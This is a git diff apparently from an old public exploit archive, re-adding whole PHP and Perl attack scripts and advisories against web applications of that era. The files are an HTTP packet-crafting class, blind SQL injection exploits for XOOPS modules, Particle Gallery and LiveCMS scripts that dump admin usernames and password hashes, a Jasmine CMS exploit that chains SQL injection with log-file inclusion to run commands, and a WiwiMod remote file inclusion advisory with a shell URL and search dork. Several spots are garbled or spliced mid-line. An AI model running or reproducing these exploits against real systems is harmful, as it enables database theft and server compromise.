+	 */
+	public function proxyauth($proxyauth,$proxypasse='')
+	{
+		// $this->proxyauth("darkfig:password");
+		if(empty($proxypasse))
+		{
+			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
+			$proxu = $proxautharr[1];
+			$proxp = $proxautharr[2];
+			$this->proxyuser=$proxu;
+			$this->proxypass=$proxp;
+		}
+		// $this->proxyauth("darkfig","password");
+		else
+		{
+			$this->proxyuser=$proxyauth;
+			$this->proxypass=$proxypasse;
+		}
+	}
+
+	
+	/**
+	 * This function allows you to set the "User-Agent" header.
+	 * Several methods are possible to do that:
+	 * 
+	 * $this->agent("Mozilla Firefox");
+	 * or
+	 * $this->addheader("User-Agent: Mozilla Firefox");
+	 * or
+	 * $this->addheader("User-Agent","Mozilla Firefox");
+	 * 
+	 * @param string $useragent
+	 */
+	public function agent($useragent)
+	{
+		$this->agent=$useragent;
+	}
+
+	
+	/**
+	 * This function returns the header which will be
+	 * in the next request.
+	 * 
+	 * $this->showheader();
+	 *
+	 * @return $header
+	 */
+	public function showheader()
+	{
+		return $this->header;
+	}
+
+	
+	/**
+	 * This function returns the cookie which will be
+	 * in the next request.
+	 * 
+	 * $this->showcookie();
+	 *
+	 * @return $storedcookies
+	 */
+	public function showcookie()
+	{
+		return $this->cookie;
+	}
+
+	
+	/**
+	 * This function returns the last formed
+	 * http request (the http packet).
+	 * 
+	 * $this->showlastrequest();
+	 * 
+	 * @return $last_http_request
+	 */
+	public function showlastrequest()
+	{
+		return $this->packet;
+	}
+	
+	
+	/**
+	 * This function sends the formed http packet with the
+	 * GET method. You can precise the port of the host.
+	 * 
+	 * $this->get("http://localhost");
+	 * $this->get("http://localhost:888/xd/tst.php");
+	 * 
+	 * @param string $urlwithpath
+	 * @return $server_response
+	 */
+	public function get($url)
+	{
+		$this->target($url);
+		$this->method="get";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed http packet with the
+	 * POST method. You can precise the port of the host.
+	 * 
+	 * $this->post("http://localhost/index.php","admin=1&user=dark");
+	 *
+	 * @param string $urlwithpath
+	 * @param string $postdata
+	 * @return $server_response
+	 */	
+	public function post($url,$data)
+	{
+		$this->target($url);
+		$this->method="post";
+		$this->data=$data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http packet with the
+	 * POST method using the multipart/form-data enctype. 
+	 * 
+	 * $array = array(
+	 *          frmdt_url      => "http://localhost/upload.php",
+	 *          frmdt_boundary => "123456",                    # Optional
+	 *                 "email" => "me@u.com",
+	 *               "varname" => array(
+	 *                            frmdt_type => "image/gif",   # Optional
+	 *                       frmdt_transfert => "binary",      # Optional
+	 *                        frmdt_filename => "hello.php",
+	 *                         frmdt_content => ""));
+	 * $this->formdata($array);
+	 *
+	 * @param array $array
+	 * @return $server_response
+	 */
+	public function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method="formdata";
+		$this->data='';
+		if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit";
+		else $this->boundary=$array[frmdt_boundary];
+		foreach($array as $key => $value)
+		{
+			if(!preg_match("#^frmdt_(boundary|url)#",$key))
+			{
+				$this->data .= "-----------------------------".$this->boundary."\r\n";
+				$this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n";
+					if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n";
+					if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n";
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+		$this->data .= "-----------------------------".$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content of the server response
+	 * without the headers.
+	 * 
+	 * $this->getcontent($this->get("http://localhost/"));
+	 * or
+	 * $this->getcontent();
+	 *
+	 * @param string $server_response
+	 * @return $onlythecontent
+	 */
+	public function getcontent($code='')
+	{
+		if(empty($code)) $code = $this->recv;
+		$content = explode("\n",$code);
+		$onlycode = '';
+		for($i=1;$igetheader($this->post("http://localhost/x.php","x=1&z=2"));
+	 * or
+	 * $this->getheader();
+	 *
+	 * @param string $server_response
+	 * @return $onlytheheaders
+	 */
+	public function getheader($code='')
+	{
+		if(empty($code)) $code = $this->recv;
+		$header = explode("\n",$code);
+		$onlyheader = $header[0]."\n";
+		for($i=1;$iaddcookie($cookn,$cookv);
+		}
+    }
+
+	
+	/**
+	 * This function is called by the get()/post() functions.
+	 * You don't have to call it.
+	 *
+	 * @param string $urltarg
+	 */
+	private function target($urltarg)
+	{
+		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
+		$this->url=$urltarg;
+		
+		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
+		$this->host=$array[0];
+
+		preg_match("/:(\d+)\//",$urltarg,$matches);
+		$this->port=empty($matches[1]) ? 80 : $matches[1];
+		
+		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
+		preg_match("/\/(.*)\//",$temp,$matches);
+		$this->path=str_replace("//","/","/".$matches[1]."/");
+	
+		if($this->port > 65535) die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function, the script will
+	 * extract all "Set-Cookie" headers values
+	 * and it will automatically add them into the "Cookie" header
+	 * for all next requests.
+	 *
+	 * $this->cookiejar(1); // enabled
+	 * $this->cookiejar(0); // disabled
+	 * 
+	 */
+	public function cookiejar($code)
+	{
+		if($code===0) $this->cookiejar='';
+		if($code===1) $this->cookiejar=1;
+		else
+		{
+			$this->getcookie($code);
+		}
+	}
+
+
+	/**
+	 * If you call this function, the script will
+	 * follow all redirections sent by the server.
+	 * 
+	 * $this->allowredirection(1); // enabled
+	 * $this->allowredirection(0); // disabled
+	 * 
+	 * @return $this->get($locationresponse)
+	 */
+	public function allowredirection($code)
+	{
+		if($code===0) $this->allowredirection='';
+		if($code===1) $this->allowredirection=1;
+		else
+		{
+			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
+			{
+				$location = str_replace(chr(13),'',$codearr[2]);
+				if(!eregi("://",$location))
+				{
+					return $this->get("http://".$this->host.$this->path.$location);
+				}
+				else
+				{
+					return $this->get($location);
+				}
+			}
+			else
+			{
+				return $code;
+			}
+		}
+	}
+	
+	
+	/**
+	 * This function allows you to reset some parameters:
+	 * 
+	 * $this->reset(header); // headers cleaned
+	 * $this->reset(cookie); // cookies cleaned
+	 * $this->reset();       // clean all parameters
+	 *
+	 * @param string $func
+	 */
+	public function reset($func='')
+	{
+		switch($func)
+		{
+			case "header":
+			$this->header='';
+			break;
+			
+			case "cookie":
+			$this->cookie='';
+			break;
+			
+			default:
+		        $this->cookiejar='';
+		        $this->header='';
+		        $this->cookie='';
+		        $this->allowredirection=''; 
+		        $this->agent='';
+		        break;
+		}
+	}
+}
+?>
+
+# milw0rm.com [2007-04-03]
diff --git a/platforms/php/webapps/3655.htm b/platforms/php/webapps/3655.htm
index 1e86d6bac..731b99517 100755
--- a/platforms/php/webapps/3655.htm
+++ b/platforms/php/webapps/3655.htm
@@ -1,290 +1,290 @@
-
-
-XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
-
-
-
-   
-
- 
-
-
    
-
-
    XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
    
-
-
    
-    Target:[http://[target]/
-               
-  
    
-
    
-     Path:[http://[target]/[scriptpath]    
-  
-  
    
-     Character:[Md5 
-  Character 1-32]   
-  
-
    
-  
    
-    Article Id:[print.php?articleid=]   
-  
-
    
-  
    
-
    
- 
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-04-03]
+
+
+XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+    Article Id:[print.php?articleid=]   
+  
+
    
+  
    
+
    
+ 
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-04-04]
+
+
+XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+    Article Id:[print.php?articleid=]   
+  
+
    
+  
    
+
    
+",$temp3[1]);
-		$ret_hash=$temp4[0];
-
-		echo "\r\n[+] Admin User: " . $ret_hash . "\n";}
-    else{} 
-}
-
-footer();
-
-?>
-
-# milw0rm.com [2007-06-01]
+#!/usr/bin/php -q -d short_open_tag=on
+set_var("COMMENT_ID", "");
+if ($_GET["editcomment"] <> ""){
+	$sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($_GET["editcomment"]);
+	$cme = $db->execute($sql);
+	if ($usr->Access > 1 || ($_SESSION["userid"] == $cme->fields["userid"])){
+		// allow user to edit the comment
+		$t->set_var("COMMENTS_TYPE", "Edit");
+		$t->set_var("COMMENT_ID", $cme->fields["commentid"]);
+		$t->set_var("COMMENTS_FORM", $core . "&commentspage=" . $page);
+		if ($_POST["comments"] <> ""){
+			$t->set_var("COMMENTS_TEXT", un($_POST["comments"]));
+		} else {
+			$t->set_var("COMMENTS_TEXT", $cme->fields["comments"]);
+		}
+	}
+
+
+...classic!
+
+*/
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+if ($argc<3) {
+print "-------------------------------------------------------------------------\r\n";
+print "              Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_pg.php [HOST] [PATH]\r\n\r\n";
+print "[HOST] 	  = Target server's hostname or ip address\r\n";
+print "[PATH] 	  = Path where Particle Gallery is located\r\n";
+print "e.g. w4ck1ng_pg.php 0 victim.com /pg/\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+die;
+}
+
+function footer(){
+
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+}
+
+//Props to rgod for the following functions
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host = $argv[1];
+$path = $argv[2];
+$port=80;
+$proxy="";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{
+$cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+print "-------------------------------------------------------------------------\r\n";
+print "              Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+    echo "\r\n[+] Checking if user exists...";
+
+    $data="username=w4ck1ng";
+    $data.="&password=w4ck1ng";
+    $data.="&from=";
+    $packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+
+    sendpacketii($packet);
+
+    if (strstr($html,"User Control Panel")){echo "...Yep!\r\n";}
+    else{echo "...Nope!"; 
+ 
+    echo "\r\n[+] Registering...";
+
+    $data="rusername=w4ck1ng";
+    $data.="&password=w4ck1ng";
+    $data.="&password2=w4ck1ng";
+    $data.="&email=w4ck1ng%40www.com";
+    $data.="&do=register";
+    $packet ="POST " . $p . "auth.php?page=register HTTP/1.1\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+
+    sendpacketii($packet);
+
+    $temp=explode("Set-Cookie: ",$html);
+    $temp2=explode(" ",$temp[1]);
+    $cookie=$temp2[0];
+
+    if (strstr($html,"Location: index.php?act=newbie")){echo "...Successful!\r\n";}
+    if (strstr($html,"Registrations are not currently being accepted.")){echo "...Registration Disabled!\r\n"; footer(); exit;}
+    else{} }
+
+    echo "[+] Signing In...";
+
+    $data="username=w4ck1ng";
+    $data.="&password=w4ck1ng";
+    $data.="&from=";
+    $packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+
+    sendpacketii($packet);
+
+    $temp=explode("Set-Cookie: ",$html);
+    $temp2=explode(" ",$temp[1]);
+    $cookie=$temp2[0];
+
+    if (strstr($html,"Welcome to your account control panel")){echo "...Successful!";}
+    else{die("...Failed!\r\n"); footer(); exit;} 
+
+    $packet ="GET " . $p . " HTTP/1.1\r\n";
+    $packet.="Host: " . $host . "\r\n";
+    $packet.="Cookie: " . $cookie . "\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+        if (strstr($html,"
    ",$temp[1]);
-    $password = $temp2[0];
-
-    if($username && $password){
-	
-	head();
-	print "[+] Admin User: " . $username . "\r\n";
-    	print "[+] Admin Hash: " . $password . "\r\n";
-	footer();
-
-    }
-
-	else{head(); print "[-] Exploit Failed...\r\n"; footer();}
-}
-?>
-
-# milw0rm.com [2007-06-19]
+#!/usr/bin/php -q -d short_open_tag=on
+'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+function head(){
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "        Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+}
+
+function footer(){
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+}
+
+
+if ($exploit==0){
+
+head();
+
+$code="";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+sendpacketii($packet);
+
+$sql = "' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*";
+
+$data="login_username=" . $sql;
+$data.="&login_password=";
+$data.="login=Login";
+$packet ="POST " . $path . "login.php HTTP/1.1\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+if (strstr($html,"302 Found")){}
+else{print "[-] Exploit Failed...\r\n"; footer(); exit();}
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[1]);
+$cookie=$temp2[0];
+
+$paths= array (
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../../../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $path . "admin/plugin_manager.php?u=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="Host: " . $host . "\r\n"; 
+$packet.="Cookie: " . $cookie . "\r\n";
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+    {
+     $temp=explode("w4ckw4ck",$html);
+        print $temp[1];
+        footer(); exit;
+    }
+  }
+}
+
+if($exploit==1){
+
+    $sql = "news.php?item=-999/**/UNION/**/SELECT/**/0,password,0,0,0,0,username/**/FROM/**/user/**/WHERE/**/id=1/*";
+    $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
+    $packet.="Host: " . $host . "\r\n";
+    $packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+    $temp = explode("Posted by ",$html);
+    $temp2 = explode("at ",$temp[1]);
+    $username = $temp2[0];
+
+    $temp = explode("",$temp[1]);
+    $password = $temp2[0];
+
+    if($username && $password){
+	
+	head();
+	print "[+] Admin User: " . $username . "\r\n";
+    	print "[+] Admin Hash: " . $password . "\r\n";
+	footer();
+
+    }
+
+	else{head(); print "[-] Exploit Failed...\r\n"; footer();}
+}
+?>
+
+# milw0rm.com [2007-06-19]
diff --git a/platforms/php/webapps/4082.pl b/platforms/php/webapps/4082.pl
index 58970088f..4f6b88468 100755
--- a/platforms/php/webapps/4082.pl
+++ b/platforms/php/webapps/4082.pl
@@ -1,145 +1,145 @@
-#!/usr/bin/perl
-##############################################################################################
-#         ___   ___                         _
-#        / _ \ / _ \                       | |
-#   __ _| | | | | | |_ __  ___   _ __   ___| |_
-#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
-# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
-#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
-#   __/ |
-#  |___/
-###############################################################################################
-#INFO:
-#Program Title ################################################################################
-#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
-#
-#Description ##################################################################################
-#This is a free CMS system.
-#
-#Script Download ##############################################################################
-#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
-#http://livecms.com
-#
-#Original Advisory #############################################################################
-#http://www.g00ns-forum.net/showthread.php?t=9350
-#
-#Exploit #######################################################################################
-#credz to Vipsta and Clorox for vulnerability
-#[c]ode by TrinTiTTY (2007) www.g00ns.net
-#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
-#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, , Bernard, and everyone else at g00ns.net
-#
-#Details #######################################################################################                              
-#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
-#variable. example: categoria.php?cid='
-#XSS: Article names are not properly santised, a user could insert malicious javascript
-#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
-#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
-#GoogleDork: "powered by livecms"
-#
-################################################################################################
-#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
-#                LiveCMS <= 3.3  [ categoria.php ]               #
-#                    ] Remote SQL Injection [                    #
-#                                                                #
-#              [c]ode by TrinTiTTY [at] g00ns.net                #
-#              Vulnerability by Vipsta and Clorox                #
-#                                                                #
-#                                                                #
-#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
-#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
-
-use LWP;
-
-$host = @ARGV[0];
-$ua = LWP::UserAgent->new;
-
-my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
-my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
-
-if (@ARGV < 1){&top( );&usage( )}
-elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
-else { &getUser( ) }
-
-
-
-sub getUser( ) {
-  system("color 4");
-  &top( );
-  print "\n [~] Retrieving admin username\n";
-  $nameres = $ua->get("http://$host/$uject");
-
-  $namecon = $nameres->content;
-
-  if ($namecon =~ /\){
-     $crack = $1;
-     print "\n [+] Password hash resolved: $crack\n";
-     system("color 7");
-     exit(0);
-  }
-  else {
-     print "\n [-] Couldn't resolve hash\n";
-     system("color 7");
-     exit(0);
-  }
-}
-sub top( )
-{
-  print q {
-  ##################################################################
-  #                LiveCMS <= 3.3  [ categoria.php ]               #
-  #                    ] Remote SQL Injection [                    #
-  #                                                                #
-  #                [c]ode by TrinTiTTY [at] g00ns.net              #
-  #                Vulnerability by Vipsta and Clorox              #
-  ##################################################################
-  }
-}
-sub usage( )
-{
-  print "\n Usage: perl livecms33.pl \n";
-  print "\n Example: perl livecms33.pl www.example.com/path\n\n";
-  exit(0);
-}
-
-# milw0rm.com [2007-06-20]
+#!/usr/bin/perl
+##############################################################################################
+#         ___   ___                         _
+#        / _ \ / _ \                       | |
+#   __ _| | | | | | |_ __  ___   _ __   ___| |_
+#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
+# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
+#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
+#   __/ |
+#  |___/
+###############################################################################################
+#INFO:
+#Program Title ################################################################################
+#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
+#
+#Description ##################################################################################
+#This is a free CMS system.
+#
+#Script Download ##############################################################################
+#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
+#http://livecms.com
+#
+#Original Advisory #############################################################################
+#http://www.g00ns-forum.net/showthread.php?t=9350
+#
+#Exploit #######################################################################################
+#credz to Vipsta and Clorox for vulnerability
+#[c]ode by TrinTiTTY (2007) www.g00ns.net
+#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
+#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, , Bernard, and everyone else at g00ns.net
+#
+#Details #######################################################################################                              
+#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
+#variable. example: categoria.php?cid='
+#XSS: Article names are not properly santised, a user could insert malicious javascript
+#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
+#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
+#GoogleDork: "powered by livecms"
+#
+################################################################################################
+#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
+#                LiveCMS <= 3.3  [ categoria.php ]               #
+#                    ] Remote SQL Injection [                    #
+#                                                                #
+#              [c]ode by TrinTiTTY [at] g00ns.net                #
+#              Vulnerability by Vipsta and Clorox                #
+#                                                                #
+#                                                                #
+#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
+#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
+
+use LWP;
+
+$host = @ARGV[0];
+$ua = LWP::UserAgent->new;
+
+my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
+my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
+
+if (@ARGV < 1){&top( );&usage( )}
+elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
+else { &getUser( ) }
+
+
+
+sub getUser( ) {
+  system("color 4");
+  &top( );
+  print "\n [~] Retrieving admin username\n";
+  $nameres = $ua->get("http://$host/$uject");
+
+  $namecon = $nameres->content;
+
+  if ($namecon =~ /\){
+     $crack = $1;
+     print "\n [+] Password hash resolved: $crack\n";
+     system("color 7");
+     exit(0);
+  }
+  else {
+     print "\n [-] Couldn't resolve hash\n";
+     system("color 7");
+     exit(0);
+  }
+}
+sub top( )
+{
+  print q {
+  ##################################################################
+  #                LiveCMS <= 3.3  [ categoria.php ]               #
+  #                    ] Remote SQL Injection [                    #
+  #                                                                #
+  #                [c]ode by TrinTiTTY [at] g00ns.net              #
+  #                Vulnerability by Vipsta and Clorox              #
+  ##################################################################
+  }
+}
+sub usage( )
+{
+  print "\n Usage: perl livecms33.pl \n";
+  print "\n Example: perl livecms33.pl www.example.com/path\n\n";
+  exit(0);
+}
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4084.txt b/platforms/php/webapps/4084.txt
index 638d05877..79fb95415 100755
--- a/platforms/php/webapps/4084.txt
+++ b/platforms/php/webapps/4084.txt
@@ -1,31 +1,31 @@
-# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability
-
-# D.Script:
-      
-http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip
-
-# V.Code :
-      include $spaw_root.'config/spaw_control.config.php';
-      include $spaw_root.'class/toolbars.class.php';
-      include $spaw_root.'class/lang.class.php';
-
-# In :
-      /spaw/spaw_control.class.php
-
-# Exploits:
-      /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?
-
-#D0Rk:
-      allinurl:/modules/wiwimod/
-
-
-# Discovered by:
-      GoLd_M = [Mahmood_ali]
-
-# Homepage:
-      http://www.Tryag.Com/cc
-
-# Sp.Thanx To :
-      Tryag-Team & Asb-May's Team
-
-# milw0rm.com [2007-06-20]
+# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability
+
+# D.Script:
+      
+http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip
+
+# V.Code :
+      include $spaw_root.'config/spaw_control.config.php';
+      include $spaw_root.'class/toolbars.class.php';
+      include $spaw_root.'class/lang.class.php';
+
+# In :
+      /spaw/spaw_control.class.php
+
+# Exploits:
+      /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?
+
+#D0Rk:
+      allinurl:/modules/wiwimod/
+
+
+# Discovered by:
+      GoLd_M = [Mahmood_ali]
+
+# Homepage:
+      http://www.Tryag.Com/cc
+
+# Sp.Thanx To :
+      Tryag-Team & Asb-May's Team
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4085.txt b/platforms/php/webapps/4085.txt
index b4fc83b98..4c1fd19ca 100755
--- a/platforms/php/webapps/4085.txt
